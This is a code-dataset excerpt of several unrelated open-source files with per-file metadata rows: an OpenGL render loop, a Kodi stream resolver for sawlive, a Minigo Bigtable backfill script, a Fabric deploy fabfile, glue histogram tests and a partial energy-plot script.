RenderTargets.ATMOSPHERE_INSCATTER)
self.scene_manager.atmosphere.render_precomputed_atmosphere(RenderTargets.LINEAR_DEPTH,
RenderTargets.COMPOSITE_SHADOWMAP,
RenderOption.RENDER_LIGHT_PROBE)
glEnable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(False)
# Composite Atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
self.set_blend_state(True, GL_FUNC_ADD, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
composite_atmosphere = self.resource_manager.get_material_instance("precomputed_atmosphere.composite_atmosphere")
composite_atmosphere.use_program()
above_the_cloud = self.scene_manager.atmosphere.cloud_altitude < main_camera.transform.get_pos()[1]
composite_atmosphere.bind_uniform_data("above_the_cloud", above_the_cloud)
composite_atmosphere.bind_uniform_data("inscatter_power", self.scene_manager.atmosphere.inscatter_power)
composite_atmosphere.bind_uniform_data("texture_atmosphere", RenderTargets.ATMOSPHERE)
composite_atmosphere.bind_uniform_data("texture_inscatter", RenderTargets.ATMOSPHERE_INSCATTER)
composite_atmosphere.bind_uniform_data("texture_linear_depth", RenderTargets.LINEAR_DEPTH)
self.postprocess.draw_elements()
# prepare translucent
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glEnable(GL_DEPTH_TEST)
# Translucent
self.render_translucent()
# render particle
if RenderOption.RENDER_EFFECT:
glDisable(GL_CULL_FACE)
glEnable(GL_BLEND)
self.render_effect()
glDisable(GL_BLEND)
glEnable(GL_CULL_FACE)
# render probe done
if RenderOption.RENDER_LIGHT_PROBE:
return
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
self.set_blend_state(False)
self.render_postprocess()
if RenderOption.RENDER_OBJECT_ID:
self.render_object_id()
self.render_selected_object()
# debug render target
if self.debug_texture is not None:
self.set_blend_state(False)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_texture(self.debug_texture)
if RenderOption.RENDER_FONT:
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.render_log()
if RenderOption.RENDER_DEBUG_LINE and self.debug_texture is None:
# render world axis
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER, depth_texture=RenderTargets.DEPTH)
self.render_axis()
self.debug_line_manager.bind_render_spline_program()
for spline in self.scene_manager.splines:
self.debug_line_manager.render_spline(spline)
self.debug_line_manager.render_debug_lines()
if RenderOption.RENDER_GIZMO and self.debug_texture is None:
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER, depth_texture=RenderTargets.DEPTH)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
# render spline gizmo
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.GIZMO,
self.scene_manager.spline_gizmo_render_infos,
self.render_color_material)
# render transform axis gizmo
glClear(GL_DEPTH_BUFFER_BIT)
self.render_axis_gizmo(RenderMode.GIZMO)
| bsd-2-clause | -7,607,777,899,450,570,000 | 50.525467 | 173 | 0.595565 | false | 3.928608 | false | false | false |
azumimuo/family-xbmc-addon | script.module.liveresolver/lib/liveresolver/resolvers/sawlive.py | 1 | 3289 | # -*- coding: utf-8 -*-
import re,urllib,urlparse,base64
from liveresolver.modules import client,decryptionUtils
from liveresolver.modules import jsunpack
from liveresolver.modules.log_utils import log
def resolve(url):
try:
page = re.compile('//(.+?)/(?:embed|v)/([0-9a-zA-Z-_]+)').findall(url)[0]
page = 'http://%s/embed/%s' % (page[0], page[1])
try: referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
except: referer = page
try: host = urlparse.parse_qs(urlparse.urlparse(url).query)['host'][0]
except: host = 'sawlive.tv'
headers={'User-Agent': client.agent(),'Host': host, 'Referer': referer, 'Connection': 'keep-alive'}
result = client.request(page, referer=referer)
result = decryptionUtils.doDemystify(result)
url = client.parseDOM(result, 'iframe', ret='src')[-1]
url = url.replace(' ', '').replace('+','')
var = re.compile('var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
for i in range(100):
for v in var: result = result.replace(" %s " % v[0], ' %s '%v[1])
var = re.compile('var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
var_dict = dict(var)
for v in var:
if '+' in v[1]:
ss = v[1].rstrip('+').replace('"+','').split('+')
sg = v[1].rstrip('+').replace('"+','')
for s in ss:
sg = sg.replace(s, var_dict[s])
var_dict[v[0]]=sg.replace('+','')
for i in range(100):
for v in var_dict.keys(): url = url.replace("'%s'" % v, var_dict[v])
for v in var_dict.keys(): url = url.replace("(%s)" % v, "(%s)" % var_dict[v])
result = client.request(url, headers = headers)
result = decryptionUtils.doDemystify(result)
var = re.compile('var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
var_dict = dict(var)
file = re.compile("'file'\s*(.+?)\)").findall(result)[0]
file = file.replace('\'','')
for v in var_dict.keys():
file = file.replace(v,var_dict[v])
file = file.replace('+','').replace(',','').strip()
log("Sawlive: Found file url: " + file)
try:
log("Sawlive: Finding m3u8 link.")
if not file.startswith('http'): raise Exception()
url = client.request(file, output='geturl')
if not '.m3u8' in url: raise Exception()
url += '|%s' % urllib.urlencode({'User-Agent': client.agent(), 'Referer': file})
log("Sawlive: Found m3u8 link: " + url)
return url
except:
log("Sawlive: m3u8 link not found, finding rtmp.")
pass
strm = re.compile("'streamer'.+?'(.+?)'").findall(result)[0]
swf = re.compile("SWFObject\('(.+?)'").findall(result)[0]
url = '%s playpath=%s swfUrl=%s pageUrl=%s live=1 timeout=60' % (strm, file, swf, url)
url = urllib.unquote(url)
log("Sawlive: rtmp link found: " + url)
return url
except Exception as e:
log("Sawlive exception:\n" + str(e))
log("Sawlive: Resolver failed. Returning...")
return
| gpl-2.0 | -8,261,275,550,164,415,000 | 39.109756 | 107 | 0.511402 | false | 3.498936 | false | false | false |
mlcommons/training | reinforcement/tensorflow/minigo/oneoffs/eval_sgf_to_cbt.py | 4 | 8454 | #!/usr/bin/env python3
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Write Minigo eval_game records to Bigtable.
This is used to backfill eval games from before they were written by
cc-evaluator as part of https://github.com/tensorflow/minigo/pull/709
"""
import sys
sys.path.insert(0, '.')
import itertools
import multiprocessing
import os
import re
from collections import Counter
from absl import app, flags
from google.cloud import bigtable
from google.cloud.bigtable import row_filters
from tqdm import tqdm
from tensorflow import gfile
import sgf_wrapper
from bigtable_input import METADATA, TABLE_STATE
flags.DEFINE_string(
'sgf_glob', None,
'Glob for SGFs to backfill into eval_games bigtable.')
flags.mark_flags_as_required([
'sgf_glob', 'cbt_project', 'cbt_instance', 'cbt_table'
])
FLAGS = flags.FLAGS
# Constants
EVAL_PREFIX = 'e_{:0>10}'
EVAL_GAME_COUNTER = b'eval_game_counter'
SGF_FILENAME = b'sgf'
#### Common Filters
EVAL_COUNT_FILTER = row_filters.ColumnRangeFilter(
METADATA, EVAL_GAME_COUNTER, EVAL_GAME_COUNTER)
#### START ####
def grouper(iterable, n):
iterator = iter(iterable)
group = tuple(itertools.islice(iterator, n))
while group:
yield group
group = tuple(itertools.islice(iterator, n))
def latest_game_number(bt_table):
"""Return the number of the last game to be written."""
# TODO(amj): Update documentation on latest_game_number (last game or next game)?
table_state = bt_table.read_row(TABLE_STATE, filter_=EVAL_COUNT_FILTER)
if table_state is None:
return 0
value = table_state.cell_value(METADATA, EVAL_GAME_COUNTER)
# see bigtable_input.py cbt_intvalue(...)
return int.from_bytes(value, byteorder='big')
def read_existing_paths(bt_table):
"""Return the SGF filename for each existing eval record."""
rows = bt_table.read_rows(
filter_=row_filters.ColumnRangeFilter(
METADATA, SGF_FILENAME, SGF_FILENAME))
names = (row.cell_value(METADATA, SGF_FILENAME).decode() for row in rows)
processed = [os.path.splitext(os.path.basename(r))[0] for r in names]
return processed
def canonical_name(sgf_name):
"""Keep filename and some date folders"""
sgf_name = os.path.normpath(sgf_name)
assert sgf_name.endswith('.sgf'), sgf_name
# Strip off '.sgf'
sgf_name = sgf_name[:-4]
# Often eval is inside a folder with the run name.
# include from folder before /eval/ if part of path.
with_folder = re.search(r'/([^/]*/eval/.*)', sgf_name)
if with_folder:
return with_folder.group(1)
# Return the filename
return os.path.basename(sgf_name)
def process_game(path):
with open(path) as f:
sgf_contents = f.read()
root_node = sgf_wrapper.get_sgf_root_node(sgf_contents)
assert root_node.properties['FF'] == ['4'], ("Bad game record", path)
result = root_node.properties['RE'][0]
assert result.lower()[0] in 'bw', result
assert result.lower()[1] == '+', result
black_won = result.lower()[0] == 'b'
length = 0
node = root_node.next
while node:
props = node.properties
length += 1 if props.get('B') or props.get('W') else 0
node = node.next
sgf_path = canonical_name(path)
return (
(b"black", root_node.properties['PB'][0]),
(b"white", root_node.properties['PW'][0]),
# All values are strings, "1" for true and "0" for false here
(b"black_won", '1' if black_won else '0'),
(b"white_won", '0' if black_won else '1'),
(b"result", result),
(b"length", str(length)),
(b"sgf", sgf_path),
(b"tag", ""),
(b"tool", "eval_sgf_to_cbt"),
)
def read_games(glob, existing_paths):
"""Read all SGFs that match glob
Parse each game and extract relevant metadata for eval games table.
"""
globbed = sorted(gfile.Glob(glob))
skipped = 0
to_parse = []
for sgf_name in tqdm(globbed):
assert sgf_name.lower().endswith('.sgf'), sgf_name
sgf_path = canonical_name(sgf_name)
sgf_filename = os.path.basename(sgf_path)
if sgf_path in existing_paths or sgf_filename in existing_paths:
skipped += 1
continue
to_parse.append(sgf_name)
game_data = []
with multiprocessing.Pool() as pool:
game_data = pool.map(process_game, tqdm(to_parse), 100)
print("Read {} SGFs, {} new, {} existing".format(
len(globbed), len(game_data), skipped))
return game_data
def write_eval_records(bt_table, game_data, last_game):
"""Write all eval_records to eval_table
In addition to writing new rows table_state must be updated in
row `table_state` columns `metadata:eval_game_counter`
Args:
bt_table: bigtable table to add rows to.
game_data: metadata pairs (column name, value) for each eval record.
last_game: last_game in metadata:table_state
"""
eval_num = last_game
# Each column counts as a mutation so max rows is ~10000
GAMES_PER_COMMIT = 2000
for games in grouper(tqdm(game_data), GAMES_PER_COMMIT):
assert bt_table.read_row(EVAL_PREFIX.format(eval_num)), "Prev row doesn't exists"
assert bt_table.read_row(EVAL_PREFIX.format(eval_num+1)) is None, "Row already exists"
rows = []
for i, metadata in enumerate(games):
eval_num += 1
row_name = EVAL_PREFIX.format(eval_num)
row = bt_table.row(row_name)
for column, value in metadata:
row.set_cell(METADATA, column, value)
rows.append(row)
# For each batch of games print a couple of the rows being added.
if i < 5 or i + 5 > len(games):
print("\t", i, row_name, metadata[6][1])
if eval_num == last_game + len(games):
test = input("Commit ('y'/'yes' required): ")
if test.lower() not in ('y', 'yes'):
break
# TODO(derek): Figure out how to condition on atomic counter update.
# Condition all updates on the current value of last_game
game_num_update = bt_table.row(TABLE_STATE)
game_num_update.set_cell(METADATA, EVAL_GAME_COUNTER, eval_num)
print(TABLE_STATE, eval_num)
response = bt_table.mutate_rows(rows)
# validate that all rows written successfully
any_bad = False
for i, status in enumerate(response):
if status.code is not 0:
print("Row number {} failed to write {}".format(i, status))
any_bad = True
if any_bad:
break
game_num_update.commit()
def main(unusedargv):
"""All of the magic together."""
del unusedargv
bt_table = (bigtable
.Client(FLAGS.cbt_project, admin=True)
.instance(FLAGS.cbt_instance)
.table(FLAGS.cbt_table))
assert bt_table.exists(), "Table doesn't exist"
# Get current game counter, updates are conditioned on this matching.
last_game = latest_game_number(bt_table)
print("eval_game_counter:", last_game)
print()
# Get existing SGF paths so we avoid uploading duplicates
existing_paths = read_existing_paths(bt_table)
print("Found {} existing".format(len(existing_paths)))
if existing_paths:
duplicates = Counter(existing_paths)
existing_paths = set(existing_paths)
for k, v in duplicates.most_common():
if v == 1:
break
print("{}x{}".format(v, k))
print("\tmin:", min(existing_paths))
print("\tmax:", max(existing_paths))
print()
# Get all SGFs that match glob, skipping SGFs with existing records.
data = read_games(FLAGS.sgf_glob, existing_paths)
if data:
write_eval_records(bt_table, data, last_game)
if __name__ == "__main__":
app.run(main)
| apache-2.0 | 7,526,406,922,997,493,000 | 29.854015 | 94 | 0.632127 | false | 3.532804 | false | false | false |
antin/Open-Knesset | fabfile.py | 11 | 3568 | from fabric.api import run, cd, sudo, roles, runs_once, env
from fabric.contrib.files import first
# add a local_fab_settings.py file,
# so that you can access your servers
# but please, don't commit it to git.
try:
from local_fab_settings import *
except ImportError as e:
pass
env.venv_roots = ['/oknesset_web/oknesset/', '/oknesset_data/oknesset/']
env.project_dir = 'Open-Knesset'
env.ok_user = 'oknesset'
def _venv_root():
return first(*env.venv_roots)
def _project_root():
return _venv_root() + env.project_dir
def _activate():
return 'source ' + _venv_root() + 'bin/activate'
def virtualenv(command):
with cd(_project_root()):
sudo(_activate() + ' && ' + command, user=env.ok_user)
# web server stuff
def web_apache_cmd(cmd):
if cmd not in ['start', 'stop', 'restart']:
raise Exception('Unknown apache command %s' % cmd)
sudo('/etc/init.d/apache2 %s' % cmd)
def restart_oknesset():
sudo('supervisorctl restart oknesset')
def _update_commit():
with cd(_project_root()):
sudo(
'git log --pretty=format:"Code Commit: %H <br>Last Update: %cd" -n 1 > templates/last_build.txt',
user=env.ok_user)
def _chown(to_user, directory=env.project_dir):
sudo("chown -R %s %s" % (to_user, directory))
@roles('web')
def deploy_web(requirements=False):
web_apache_cmd('stop')
with cd(_venv_root()):
_chown(env.ok_user)
with cd(env.project_dir):
_git_pull()
if requirements:
_install_requirements()
virtualenv('./manage.py collectstatic --noinput')
_update_commit()
#_chown('www-data')
restart_oknesset()
web_apache_cmd('start')
# db server stuff - should only run once on master db!
@runs_once
def db_migrate_syncdb():
virtualenv('./manage.py migrate')
@roles('db')
def deploy_backend(migration=False, requirements=False):
with cd(_project_root()):
_git_pull()
if requirements:
_install_requirements()
if migration:
db_migrate_syncdb()
@roles('db_master')
def show_cron(as_user=env.ok_user):
sudo('crontab -l', user=as_user)
@roles('db')
def db_show_replication():
# works on both servers
run('ps -ef | grep postgres | grep -e receiver -e sender')
# memcache commands
@roles('web')
@runs_once
def mc_flushall():
#run('echo flush_all | telnet localhost 11211')
virtualenv(
"DJANGO_SETTINGS_MODULE='knesset.settings' " +
"python -c 'from django.core.cache import cache; cache.clear()'"
)
# commands for all servers
def _git_pull(repo='origin', branch='master', as_user=env.ok_user):
sudo("git pull %s %s" % (repo, branch), user=as_user)
def _install_requirements():
virtualenv(
'cd .. && pip install -r ' +
env.project_dir + '/requirements.txt && cd ' + _project_root())
@roles('all')
def all_upgrade_system():
sudo('apt-get update')
sudo('apt-get upgrade')
@roles('all')
def show_updates():
sudo('cat /var/lib/update-notifier/updates-available')
sudo('/usr/lib/update-notifier/update-motd-reboot-required')
@roles('all')
def all_run_cmd(cmd):
run(cmd)
@roles('all')
def all_sudo_cmd(cmd):
sudo(cmd)
def deploy_all(repo='origin', branch='master', install_requirements=False, use_migration=False, reset_memcache=False):
deploy_backend(requirements=install_requirements, migration=use_migration)
deploy_web(requirements=install_requirements)
if reset_memcache:
mc_flushall()
| bsd-3-clause | -1,471,443,326,784,855,600 | 22.629139 | 118 | 0.632848 | false | 3.312906 | false | false | false |
glue-viz/glue-qt | glue/clients/tests/test_histogram_client.py | 1 | 17190 | #pylint: disable=I0011,W0613,W0201,W0212,E1101,E1103
import pytest
from mock import MagicMock
import matplotlib.pyplot as plt
import numpy as np
from ..histogram_client import HistogramClient
from ..layer_artist import HistogramLayerArtist
from ...core.data_collection import DataCollection
from ...core.exceptions import IncompatibleDataException
from ...core.hub import Hub
from ...core.data import Data
from ...core.subset import RangeSubsetState
FIGURE = plt.figure()
plt.close('all')
class TestException(Exception):
pass
class TestHistogramClient(object):
def setup_method(self, method):
self.data = Data(x=[0, 0, 0, 1, 2, 3, 3, 10, 20],
y=[-1, -1, -1, -2, -2, -2, -3, -5, -10])
self.subset = self.data.new_subset()
self.collect = DataCollection(self.data)
self.client = HistogramClient(self.collect, FIGURE)
self.axes = self.client.axes
FIGURE.canvas.draw = MagicMock()
assert FIGURE.canvas.draw.call_count == 0
def draw_count(self):
return self.axes.figure.canvas.draw.call_count
def layer_drawn(self, layer):
return layer in self.client._artists and \
all(a.visible for a in self.client._artists[layer]) and \
all(len(a.artists) > 0 for a in self.client._artists[layer])
def layer_present(self, layer):
return layer in self.client._artists
def assert_autoscaled(self):
yra = self.client.axes.get_ylim()
datara = [99999, -99999]
for a in self.client._artists:
y = a.y
if a.y.size > 0:
datara[0] = min(datara[0], a.y.min())
datara[1] = max(datara[1], a.y.max())
np.testing.assert_array_almost_equal(yra[0], 0)
np.testing.assert_array_almost_equal(datara[1], yra[1])
def test_empty_on_creation(self):
assert self.data not in self.client._artists
def test_add_layer(self):
self.client.add_layer(self.data)
assert self.layer_present(self.data)
assert not self.layer_drawn(self.data)
self.client.set_component(self.data.components[0])
assert self.layer_drawn(self.data)
def test_add_invalid_layer_raises(self):
self.collect.remove(self.data)
with pytest.raises(IncompatibleDataException) as exc:
self.client.add_layer(self.data)
def test_add_subset_auto_adds_data(self):
subset = self.data.new_subset()
self.client.add_layer(subset)
assert self.layer_present(self.data)
assert self.layer_present(subset)
self.client.set_component(self.data.components[0])
assert self.layer_drawn(self.data)
def test_double_add_ignored(self):
self.client.add_layer(self.data)
art = self.client._artists[self.data]
self.client.add_layer(self.data)
assert self.client._artists[self.data] == art
def test_add_data_auto_adds_subsets(self):
s = self.data.new_subset()
self.client.add_layer(self.data)
assert self.layer_present(s)
def test_data_removal(self):
self.client.add_layer(self.data)
self.client.remove_layer(self.data)
assert not (self.layer_present(self.data))
def test_data_removal_removes_subsets(self):
self.client.add_layer(self.data)
self.client.remove_layer(self.data)
s = self.data.new_subset()
assert len(self.data.subsets) > 0
for subset in self.data.subsets:
assert not (self.layer_present(subset))
def test_layer_updates_on_data_add(self):
self.client.add_layer(self.data)
for s in self.data.subsets:
assert s in self.client._artists
def test_set_component_updates_component(self):
self.client.add_layer(self.data)
comp = self.data.find_component_id('uniform')
self.client.set_component(comp)
assert self.client._component is comp
def test_set_component_redraws(self):
self.client.add_layer(self.data)
comp = self.data.find_component_id('uniform')
ct0 = self.draw_count()
self.client.set_component(comp)
assert self.draw_count() > ct0
def test_remove_not_present_ignored(self):
self.client.remove_layer(self.data)
def test_set_visible_external_data(self):
self.client.set_layer_visible(None, False)
def test_get_visible_external_data(self):
assert not (self.client.is_layer_visible(None))
def test_set_visible(self):
self.client.add_layer(self.data)
self.client.set_layer_visible(self.data, False)
assert not (self.client.is_layer_visible(self.data))
def test_draw_histogram_one_layer(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.find_component_id('uniform'))
def test_draw_histogram_subset_hidden(self):
self.client.add_layer(self.data)
s = self.data.new_subset()
self.client.set_layer_visible(s, False)
self.client.set_component(self.data.find_component_id('uniform'))
def test_draw_histogram_two_layers(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.find_component_id('uniform'))
def test_update_property_set_triggers_redraw(self):
self.client.add_layer(self.data)
ct = self.draw_count()
self.client.normed ^= True
assert self.draw_count() > ct
@pytest.mark.parametrize(('prop'), ['normed', 'cumulative'])
def test_set_boolean_property(self, prop):
"""Boolean properties should sync with artists"""
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
setattr(self.client, prop, False)
for a in self.client._artists:
assert not getattr(a, prop)
setattr(self.client, prop, True)
for a in self.client._artists:
assert getattr(a, prop)
def test_set_nbins(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.nbins = 100
for a in self.client._artists[self.data]:
assert a.nbins == 100
assert a.x.size == 100 + 1
def test_autoscale(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.axes.set_ylim(0, .1)
self.client.autoscale = False
self.client.autoscale = True
self.assert_autoscaled()
def test_xlimits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = -12, 20
assert self.client.xlimits == (-12, 20)
for a in self.client._artists[self.data]:
assert a.lo == -12
assert a.hi == 20
def test_set_xlimits_out_of_data_range(self):
"""Setting xlimits outside of range shouldn't crash"""
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = 100, 200
self.client.xlimits = -200, -100
def test_component_property(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
assert self.client.component is self.data.components[0]
def test_apply_roi(self):
self.client.add_layer(self.data)
self.data.edit_subset = [self.data.subsets[0]]
roi = MagicMock()
roi.to_polygon.return_value = [1, 2, 3], [2, 3, 4]
self.client.apply_roi(roi)
state = self.data.subsets[0].subset_state
assert isinstance(state, RangeSubsetState)
assert state.lo == 1
assert state.hi == 3
def test_apply_roi_xlog(self):
self.client.add_layer(self.data)
self.data.edit_subset = [self.data.subsets[0]]
self.client.xlog = True
roi = MagicMock()
roi.to_polygon.return_value = [1, 2, 3], [2, 3, 4]
self.client.apply_roi(roi)
state = self.data.subsets[0].subset_state
assert isinstance(state, RangeSubsetState)
assert state.lo == 10
assert state.hi == 1000
def test_xlimits_sticky_with_component(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = 5, 6
self.client.set_component(self.data.components[1])
self.client.xlimits = 7, 8
self.client.set_component(self.data.components[0])
assert self.client.xlimits == (5, 6)
self.client.set_component(self.data.components[1])
assert self.client.xlimits == (7, 8)
def test_default_xlimits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
assert self.client.xlimits == (0, 20)
self.client.set_component(self.data.id['y'])
assert self.client.xlimits == (-10, -1)
def test_xlimit_single_set(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlimits = (None, 5)
assert self.client.xlimits == (0, 5)
self.client.xlimits = (3, None)
assert self.client.xlimits == (3, 5)
def test_xlimit_reverse_set(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlimits = 5, 3
assert self.client.xlimits == (3, 5)
def test_xlog_axes_labels(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlog = True
assert self.client.axes.get_xlabel() == 'Log x'
self.client.xlog = False
assert self.client.axes.get_xlabel() == 'x'
self.client.ylog = True
assert self.client.axes.get_ylabel() == 'N'
self.client.ylog = False
assert self.client.axes.get_ylabel() == 'N'
def test_xlog_snaps_limits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.axes.set_xlim((-1, 1))
self.client.xlog = True
assert self.client.axes.get_xlim() != (-1, 1)
def test_artist_clear_resets_arrays(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
for a in self.client._artists[self.data]:
assert a.get_data()[0].size > 0
a.clear()
assert a.get_data()[0].size == 0
class TestCommunication(object):
def setup_method(self, method):
self.data = Data(x=[1, 2, 3, 2, 2, 3, 1])
figure = MagicMock()
self.collect = DataCollection()
self.client = HistogramClient(self.collect, figure)
self.axes = self.client.axes
self.hub = Hub()
self.connect()
def draw_count(self):
return self.axes.figure.canvas.draw.call_count
def connect(self):
self.client.register_to_hub(self.hub)
self.collect.register_to_hub(self.hub)
def test_ignore_data_add_message(self):
self.collect.append(self.data)
assert not (self.client.layer_present(self.data))
def test_update_data_ignored_if_data_not_present(self):
self.collect.append(self.data)
ct0 = self.draw_count()
self.data.style.color = 'blue'
assert self.draw_count() == ct0
def test_update_data_processed_if_data_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
ct0 = self.draw_count()
self.data.style.color = 'blue'
assert self.draw_count() > ct0
def test_add_subset_ignored_if_data_not_present(self):
self.collect.append(self.data)
ct0 = self.draw_count()
sub = self.data.new_subset()
assert not (self.client.layer_present(sub))
def test_add_subset_processed_if_data_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
assert (self.client.layer_present(sub))
def test_update_subset_ignored_if_not_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
self.client.remove_layer(sub)
ct0 = self.draw_count()
sub.style.color = 'blue'
assert self.draw_count() == ct0
def test_update_subset_processed_if_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
ct0 = self.draw_count()
sub.style.color = 'blue'
assert self.draw_count() > ct0
def test_data_remove_message(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
self.collect.remove(self.data)
assert not self.client.layer_present(self.data)
def test_subset_remove_message(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
assert self.client.layer_present(sub)
sub.delete()
assert not self.client.layer_present(sub)
class TestHistogramLayerArtist(object):
def setup_subset(self):
ax = MagicMock()
d = Data(x=[1, 2, 3])
s = d.new_subset()
s.subset_state = d.id['x'] > 1
self.artist = HistogramLayerArtist(s, ax)
def setup_hist_calc_counter(self):
self.setup_subset()
m = MagicMock()
self.artist._calculate_histogram = m
return m
def setup_hist_scale_counter(self):
self.setup_subset()
m = MagicMock()
self.artist._scale_histogram = m
self.artist._calculate_histogram = MagicMock()
return m
def test_calculate_histogram_efficient(self):
ct = self.setup_hist_calc_counter()
self.artist.update()
assert ct.call_count == 1
self.artist.update()
assert ct.call_count == 1
def test_recalc_on_state_changes(self):
ct = self.setup_hist_calc_counter()
assert ct.call_count == 0
self.artist.update()
assert ct.call_count == 1
#lo
self.artist.lo -= 1
self.artist.update()
self.artist.update()
assert ct.call_count == 2
#hi
self.artist.hi -= 1
self.artist.update()
self.artist.update()
assert ct.call_count == 3
#nbins
self.artist.nbins += 1
self.artist.update()
self.artist.update()
assert ct.call_count == 4
#xlog
self.artist.xlog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#ylog -- no call
self.artist.ylog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#cumulative -- no call
self.artist.cumulative ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#normed -- no call
self.artist.normed ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#subset style -- no call
self.artist.layer.style.color = '#00ff00'
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#subset state
self.artist.layer.subset_state = self.artist.layer.data.id['x'] > 10
self.artist.update()
self.artist.update()
assert ct.call_count == 6
def test_rescale_on_state_changes(self):
ct = self.setup_hist_scale_counter()
assert ct.call_count == 0
self.artist.update()
self.artist.update()
assert ct.call_count == 1
#lo
self.artist.lo -= 1
self.artist.update()
self.artist.update()
assert ct.call_count == 2
#hi
self.artist.hi -= 1
self.artist.update()
self.artist.update()
assert ct.call_count == 3
#nbins
self.artist.nbins += 1
self.artist.update()
self.artist.update()
assert ct.call_count == 4
#xlog
self.artist.xlog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 5
#ylog
self.artist.ylog ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 6
#cumulative
self.artist.cumulative ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 7
#normed
self.artist.normed ^= True
self.artist.update()
self.artist.update()
assert ct.call_count == 8
#subset state
self.artist.layer.subset_state = self.artist.layer.data.id['x'] > 10
self.artist.update()
self.artist.update()
assert ct.call_count == 9
#subset style -- no call
self.artist.layer.style.color = '#00ff00'
self.artist.update()
self.artist.update()
assert ct.call_count == 9
| bsd-3-clause | 1,918,965,604,323,963,400 | 30.951673 | 76 | 0.606981 | false | 3.491064 | true | false | false |
sergeiliashko/sif | graphics/plotenergy.py | 1 | 2486 | import numpy as np
import matplotlib.pyplot as plt
from sys import argv
import matplotlib.gridspec as gridspec
from scipy.signal import argrelextrema
from scipy.interpolate import interp1d
from matplotlib.ticker import FormatStrFormatter
import matplotlib.patches as patches
import matplotlib.pyplot as plt
def main(energy_path,fName, interpolate=False):
usetrueminimas = True
usetrueminimas = False
minimums = argrelextrema(energy_path, np.less_equal)[0]
#print(energy_path[minimums])
maxima = argrelextrema(energy_path, np.greater)[0]
#print(energy_path[maxima])
energy_path = energy_path - np.min(energy_path)
#if(usetrueminimas):
# energy_path=energy_path[minimums[0]:minimums[-1]]
#
fig, ax = plt.subplots()
#ax.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
#ax.set_xticklabels([]) # disable ticks
#ax.set_aspect('auto')
M = energy_path.shape[0]
#plt.yticks(np.arange(min(energy_path), max(energy_path)+0.4, 0.1))
plt.ylim([np.min(energy_path) - .06, np.max(energy_path) + .4])
plt.ylabel('eV')
plt.xlim([0-5, M+7])
x = range(0, M)
y = energy_path
plt.plot(energy_path, linewidth=3)
#f2 = interp1d(x, y, kind='cubic')
#xnew = np.linspace(0, M-1, num=1000, endpoint=True)
#
#if(interpolate):
# plt.plot(xnew, f2(xnew), linewidth=3)
#else:
# plt.plot(x, y, linewidth=3)
#
#rn = ['I','II','III','IV','V','VI','VII']
#
#if(usetrueminimas):
# minimums = (minimums-minimums[0]) #shift the index of minimas to match new size of enrgy
# minimums[-1] = minimums[-1]-1
#
#ax.plot([minimums], [energy_path[minimums]], 'o', color='green')
